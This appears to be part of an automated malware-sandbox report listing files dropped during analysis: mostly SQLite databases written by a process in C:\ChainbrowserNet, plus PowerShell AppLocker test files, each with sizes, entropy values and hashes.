                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5712781801655107
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                          Category:dropped
                                                                                          Size (bytes):28672
                                                                                          Entropy (8bit):2.5793180405395284
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                          Category:dropped
                                                                                          Size (bytes):28672
                                                                                          Entropy (8bit):2.5793180405395284
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5712781801655107
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5712781801655107
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5712781801655107
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):98304
                                                                                          Entropy (8bit):0.08235737944063153
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
